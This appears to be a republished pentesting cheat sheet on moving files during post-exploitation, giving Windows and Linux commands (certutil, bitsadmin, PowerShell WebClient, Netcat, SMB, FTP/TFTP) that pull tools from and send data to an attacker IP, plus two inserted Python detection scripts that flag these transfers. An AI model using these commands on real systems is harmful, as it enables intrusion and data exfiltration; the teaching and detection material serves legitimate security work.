Mastering Post-Exploitation File Transfers: The Ultimate Cheat Sheet for Pentesters + Video

Introduction:

File transfer is a critical step during post‑exploitation and lateral movement in penetration testing. Security testers often need quick, reliable methods to upload or download files between compromised systems and their attacker machines. This comprehensive guide provides a ready‑to‑use cheat sheet covering native Windows and Linux tools, as well as cross‑platform utilities, to ensure you can move payloads, tools, and exfiltration data seamlessly in any engagement.

Learning Objectives:

  • Master native Windows file transfer techniques using PowerShell, certutil, BITSAdmin, and wget.
  • Leverage Linux command‑line tools like curl, scp, and Netcat for efficient data movement.
  • Set up and use various server‑side protocols (HTTP, SMB, FTP, TFTP) to support flexible file exchange.

You Should Know

1. Native Windows File Transfer Methods

Windows offers several built‑in tools for downloading files during a penetration test. Each has its own strengths and limitations.

Using PowerShell’s WebClient

PowerShell’s `WebClient` class is the most flexible method. It supports HTTP, HTTPS, and FTP and can handle authentication if needed.

Download a file
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt', 'ignite.txt')

Upload a file (requires a listening server)
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.31.141/upload', 'C:\local\file.txt')

Using Windows `wget` (Alias for Invoke-WebRequest)

The `wget` alias in PowerShell is simple but requires the `-OutFile` parameter to save the file.

wget http://192.168.31.141/ignite.txt -OutFile ignite.txt

Using `certutil` – The Certificate Utility

`certutil` is a versatile Windows binary originally designed for certificate management. It can download files and even decode base64 content.

Basic download
certutil -urlcache -f http://192.168.31.141/ignite.txt ignite.txt

Split large files
certutil -urlcache -split -f http://192.168.31.141/ignite.txt ignite.txt

Using `bitsadmin` – Background Intelligent Transfer Service

BITS is a background file transfer service that works even when the user logs off, making it useful for long downloads.

bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\Users\raj\Desktop\ignite.txt

Step‑by‑Step Guide:

  1. Set up a web server on your attacker machine (e.g., using `python3 -m http.server 8000`).
  2. On the Windows target, run any of the above commands with the correct URL and output path.
  3. Verify the file with `dir` or `type ignite.txt`.
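
Seen from the monitoring side, each of the four commands in this section leaves a recognisable process command line. The block below is an added example, not part of the original cheat sheet: a Python matcher run over constructed command lines shaped like a process-creation event's CommandLine field. The rule names and sample events are assumptions made for illustration.

```python
import re

# Constructed sample command lines, shaped like the CommandLine field of a
# process-creation event (e.g. Sysmon Event ID 1). Not real telemetry.
SAMPLE_EVENTS = [
    "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt', 'ignite.txt')",
    "powershell.exe -c wget http://192.168.31.141/ignite.txt -OutFile ignite.txt",
    "certutil.exe  -URLCache -split -f http://192.168.31.141/ignite.txt ignite.txt",
    "bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\\Users\\raj\\Desktop\\ignite.txt",
    "certutil -hashfile C:\\Temp\\setup.exe SHA256",   # benign certutil use
    "powershell Get-ChildItem C:\\Temp",                 # benign PowerShell use
]

# Each rule needs the tool name AND its transfer-specific switch or method,
# so ordinary certutil or PowerShell activity does not match.
RULES = [
    ("webclient_transfer", re.compile(r"net\.webclient\b.*\.(?:download|upload)(?:file|string|data)\b", re.I)),
    ("invoke_webrequest", re.compile(r"\b(?:wget|iwr|invoke-webrequest)\b.*\s-outf\w*", re.I)),
    ("certutil_urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/(?:transfer|addfile)\b", re.I)),
]
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\")]+", re.I)
RAW_IP_RE = re.compile(r"^http://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)", re.I)


def classify(command_line):
    """Return a finding for a command line that matches a rule, else None."""
    for name, pattern in RULES:
        if pattern.search(command_line):
            urls = URL_RE.findall(command_line)
            return {
                "rule": name,
                "urls": urls,
                # Cleartext HTTP to a bare IP address raises the priority of the alert.
                "cleartext_raw_ip": any(RAW_IP_RE.match(u) for u in urls),
            }
    return None


def scan(events):
    """Return (command_line, finding) pairs for every event that matched."""
    return [(e, f) for e in events if (f := classify(e)) is not None]


if __name__ == "__main__":
    for event, finding in scan(SAMPLE_EVENTS):
        print(finding["rule"], finding["urls"], finding["cleartext_raw_ip"])
```

The two benign lines (a `certutil -hashfile` call and a plain PowerShell listing) pass through unflagged, which is the reason each rule is keyed on the switch rather than on the binary name alone.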

2. Linux File Transfer Commands

Linux distributions come with a rich set of command‑line tools for file transfers, many of which are also available on Windows via WSL or compiled binaries.

Using `wget` and `curl`

Both tools are ubiquitous on Linux and can handle HTTP, HTTPS, and FTP.

wget
wget http://192.168.31.141/ignite.txt

curl
curl http://192.168.31.141/ignite.txt -o ignite.txt

Using `scp` – Secure Copy Protocol

`scp` leverages SSH, providing encryption and authentication. It works across Linux and Windows (with OpenSSH client).

Upload to Linux target
scp ignite.txt <user>@<target_ip>:/tmp

Upload to Windows target (requires OpenSSH server on Windows)
scp ignite.txt <user>@<target_ip>:/C:/Temp

Using Netcat (`nc`) – The Swiss Army Knife

Netcat can establish raw TCP connections, making it ideal for file transfers when other protocols are blocked.

On the receiving end (Kali Linux):

nc -lvp 5555 > file.txt

On the sending end (Ubuntu target):

nc 192.168.31.141 5555 < file.txt

Step‑by‑Step Guide:

  1. On your attacker machine, start a Netcat listener: `nc -lvp 5555 > received_file.txt`
  2. On the compromised machine, send the file: `nc <attacker_ip> 5555 < local_file.txt`
  3. The file will be written on the attacker side. Use `cat received_file.txt` to verify.

3. Using SMB for File Transfers

SMB (Server Message Block) is a native Windows protocol for file sharing. It can be used to exfiltrate data or upload tools.

Setting Up an SMB Server on Kali Linux

Use `impacket-smbserver` (part of Impacket) to share a directory.

impacket-smbserver share $(pwd) -smb2support

Accessing the SMB Share from Windows

copy \\192.168.31.141\share\ignite.txt

Uploading from Windows to Kali

copy ignite.txt \\192.168.31.141\share\ignite.txt

Connecting from Linux via `smbclient`

smbclient -L 192.168.31.141
smbclient //192.168.31.141/share
Inside the client:
get ignite.txt
put data.txt

Step‑by‑Step Guide:

  1. Start `impacket-smbserver` on your attacker machine.
  2. On the Windows target, use `copy` or `move` to interact with the share as if it were a local drive.
  3. For Linux targets, use `smbclient` to list, download, or upload files.

4. FTP and TFTP – Legacy Protocols for Special Cases

When modern protocols are blocked, FTP or TFTP can sometimes bypass restrictions.

Using Metasploit’s FTP Server

use auxiliary/server/ftp
set srvhost 192.168.31.141
set ftproot /root/raj
set ftpuser raj
set ftppass 123
run

Downloading from Windows

ftp 192.168.31.141
raj
123
get ignite.txt
bye

Using `pyftpdlib` for a Quick FTP Server

python3 -m venv pyftpdlib-venv
source pyftpdlib-venv/bin/activate
pip3 install pyftpdlib
python3 -m pyftpdlib -w -p 21 -u ignite -P 123

TFTP with Metasploit

use auxiliary/server/tftp
set srvhost 192.168.31.141
set tftproot /root/raj
run

Download from Windows

tftp -i 192.168.31.141 GET ignite.txt
dir

Step‑by‑Step Guide:

  1. Start an FTP or TFTP server on your attacker machine (Metasploit or pyftpdlib).
  2. On the Windows target, use the built‑in `ftp` or `tftp` client to connect and retrieve files.
  3. Note that TFTP is unauthenticated and UDP‑based, so it may be unreliable for large files.

5. Setting Up a Quick HTTP Server

Sometimes you just need a lightweight HTTP server to serve files.

Using Python (any version)

Python 2
python2 -m SimpleHTTPServer 80

Python 3
python3 -m http.server 8000

Using PHP

php -S 0.0.0.0:8081

Using Updog – A Python Replacement

Updog is an improved version of Python’s `SimpleHTTPServer` with better performance and support for uploads.

pip3 install updog
updog -p 80

Step‑by‑Step Guide:

  1. Choose your preferred HTTP server and start it on your attacker machine.
  2. On the target, use any HTTP client (wget, curl, certutil, etc.) to download files from `http://<attacker_ip>:<port>/filename`.
  3. For uploads, use a tool like `curl -F` or a custom script.
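
On the network side, the HTTP clients named in step 2 stand out by their default User-Agent headers, especially when the destination is a bare IP address over cleartext HTTP. The block below is an added example, not part of the original cheat sheet: a Python filter over constructed proxy records. The record layout is hypothetical, and the User-Agent values are the tools' defaults, which a client can override.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed proxy records (client, url, user_agent); not real traffic.
SAMPLE_PROXY_LOG = [
    ("10.0.5.23", "http://192.168.31.141/ignite.txt", "Microsoft-CryptoAPI/10.0"),
    ("10.0.5.23", "http://192.168.31.141/ignite.txt", "CertUtil URL Agent"),
    ("10.0.5.40", "http://192.168.31.141:8000/ignite.txt", "Microsoft BITS/7.8"),
    ("10.0.5.41", "http://192.168.31.141:8000/ignite.txt",
     "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"),
    ("10.0.5.42", "http://192.168.31.141:8081/ignite.txt", "curl/7.88.1"),
    ("10.0.5.43", "http://192.168.31.141/ignite.txt", ""),
    ("10.0.5.50", "http://updates.example.com/pkg.cab", "Microsoft BITS/7.8"),
    ("10.0.5.51", "http://203.0.113.9/index.html",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36"),
]

# Default User-Agent prefixes (lowercased) for the transfer tools on this page.
TOOL_UA_PREFIXES = {
    "certutil": ("certutil url agent", "microsoft-cryptoapi/"),
    "bits": ("microsoft bits/",),
    "curl": ("curl/",),
    "wget": ("wget/",),
}

def tool_for(user_agent):
    """Map a User-Agent header to a transfer tool name, or None for anything else."""
    ua = user_agent.strip().lower()
    if not ua:
        return "no-user-agent"   # System.Net.WebClient sends none by default
    if "windowspowershell/" in ua:
        return "powershell"      # Invoke-WebRequest in Windows PowerShell
    for tool, prefixes in TOOL_UA_PREFIXES.items():
        if ua.startswith(prefixes):
            return tool
    return None

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def suspicious(records):
    """Flag tool-generated cleartext HTTP requests whose host is an IP literal."""
    hits = []
    for client, url, ua in records:
        parts, tool = urlsplit(url), tool_for(ua)
        if tool and parts.scheme == "http" and is_ip_literal(parts.hostname or ""):
            hits.append((client, tool, parts.hostname, parts.port or 80))
    return hits
```

Neither signal fires alone: the BITS request to a named update host and the browser request to a bare IP are both left out, so only the combination is reported.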

6. Cross‑Platform File Transfers with Netcat

Netcat is invaluable when firewalls block all other protocols. It can be used in both directions.

Send a file from Windows to Kali (requires `nc.exe` on Windows):

On Kali (receiver):

nc -lvp 5555 > data.txt

On Windows (sender):

nc.exe 192.168.31.141 5555 < data.txt

Send a file from Linux to Windows (Windows must have a listening Netcat):

On Windows (receiver):

nc.exe -lvp 5555 > file.txt

On Linux (sender):

nc 192.168.31.219 5555 < file.txt

Step‑by‑Step Guide:

  1. Transfer `nc.exe` to the Windows target if it’s not already present.
  2. On the receiving side, start a listener with output redirection: `nc -lvp <port> > received_file`.
  3. On the sending side, pipe the file into Netcat: `nc <receiver_ip> <port> < file_to_send`.

What Undercode Say

  • Flexibility is key: No single file transfer method works in every environment. A pentester must be familiar with at least 5‑6 different techniques to adapt to firewalls, EDRs, and network restrictions.
  • Native tools are your friends: Windows tools like `certutil` and `bitsadmin` are often overlooked but can bypass application whitelisting. Similarly, Linux’s `scp` and `curl` are almost always available.
  • Server‑side setup matters: Quickly spinning up an HTTP, SMB, or FTP server on your attacker machine is a core skill. Tools like Updog and `impacket-smbserver` make this trivial.
  • Netcat remains the ultimate fallback: When all else fails, a raw TCP connection with Netcat works on any platform, provided you have the binary. It’s slow and unencrypted, but it gets the job done.

Analysis: The cheat sheet covers the most common file transfer methods used in real‑world red team operations. The inclusion of both Windows and Linux commands, as well as server‑side setups, makes it a practical reference. However, it lacks coverage of encrypted alternatives (e.g., `rsync` over SSH) and advanced evasion techniques (e.g., splitting files into chunks, using DNS tunneling). Future updates should address these gaps.

Prediction

As enterprises adopt stricter zero‑trust models and next‑gen firewalls, traditional file transfer methods will face increasing scrutiny. We will see a rise in protocol hopping (e.g., moving from HTTP to DNS to ICMP) and the use of legitimate cloud APIs (OneDrive, Dropbox) for covert exfiltration. Additionally, AI‑driven EDRs will begin to detect anomalous file transfer patterns, forcing attackers to adopt more sophisticated, low‑and‑slow data leakage techniques. The cheat sheet of tomorrow will include methods like SSH reverse port forwarding, ICMP tunneling, and WebSocket‑based transfers to bypass modern defenses.

Reported By: File Transfer – Hackers Feeds